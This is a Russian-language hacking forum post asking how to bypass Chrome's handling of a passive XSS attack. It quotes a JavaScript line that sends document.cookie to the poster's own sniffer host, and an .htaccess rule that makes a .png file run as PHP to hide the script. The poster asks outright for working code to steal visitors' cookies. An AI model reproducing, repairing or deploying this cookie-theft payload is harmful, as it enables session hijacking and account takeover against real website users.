20.02.2012, 13:26
|
|
Новичок
Регистрация: 28.01.2012
Сообщений: 7
Провел на форуме:
1927
Репутация:
0
|
|
Обход пассивка xss Chrome
Видел одну тему:
Код HTML:
Обход Chrome
и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например
img = new Image(); img.src = "http://s.gif?"+document.cookie;
это мы скрываем расширение .js
и открываем на хосте файлом .htaccess нашу картинку и кукисы наши .
Делаю так - в .htaccess у меня :AddType application/x-httpd-php .png; Сделал картинку test.png в ней написал код :
img = new Image(); img.src = "http://мой_сниффер/image.png?"+document.cookie; - т.е перенаправляю на мой сниффер.
Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie...
Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess? |
|
|